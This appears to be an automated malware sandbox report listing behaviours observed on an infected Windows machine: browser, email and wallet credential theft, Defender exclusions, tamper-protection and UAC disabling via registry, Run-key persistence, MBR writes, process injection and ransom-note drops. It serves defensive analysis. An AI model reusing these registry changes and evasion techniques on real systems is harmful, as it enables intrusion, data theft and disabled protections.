N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\Desktop\a\New.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP2663 = "C:\\Users\\Admin\\AppData\\Local\\RageMP2663\\RageMP2663.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest2663 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest2663\\MaxLoonaFest2663.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\\AdobeUpdaterV2663.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\Desktop\a\lenin.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\U: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\E: C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Desktop\a\ld.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Desktop\a\ld.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 632 set thread context of 1076 N/A C:\Users\Admin\Desktop\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5424 set thread context of 1792 N/A C:\Users\Admin\Desktop\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 4564 set thread context of 640 N/A C:\Users\Admin\Desktop\a\volumeinfo.exe C:\Users\Admin\Desktop\a\volumeinfo.exe
PID 2832 set thread context of 5960 N/A C:\Users\Admin\Desktop\a\RambledMimets.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5596 set thread context of 6152 N/A C:\Users\Admin\Desktop\a\CapSimple.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5528 set thread context of 6060 N/A C:\Users\Admin\Desktop\a\RambledMime.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6060 set thread context of 6292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6936 set thread context of 5284 N/A C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8340 set thread context of 8628 N/A C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5284 set thread context of 8924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8072 set thread context of 6236 N/A C:\Users\Admin\Desktop\a\file300un.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 5036 set thread context of 6780 N/A C:\Users\Admin\Desktop\a\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8628 set thread context of 7316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5676 set thread context of 5016 N/A C:\Users\Admin\Desktop\a\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 7036 set thread context of 7384 N/A C:\Users\Admin\Desktop\a\alex.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8476 set thread context of 6296 N/A C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-125_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\23.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Videos\SmartSelect\Magic_Select_crop_handles.mp4 C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxSignature.p7x C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\he-il\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64_altform-unplated.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-black_scale-125.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\MediumTile.scale-200_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.password.template C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007 C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-100_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-white.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office15\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-100_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-400_contrast-black.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_altform-unplated_contrast-white.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_ReptileEye.png C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\2.jpg C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_2019.729.2301.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\1.jpg C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-white.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.config C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms C:\Users\Admin\Desktop\a\ld.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireMedTile.scale-200.jpg C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\HOW TO BACK FILES.txt C:\Users\Admin\Desktop\a\ld.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\Desktop\a\random.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
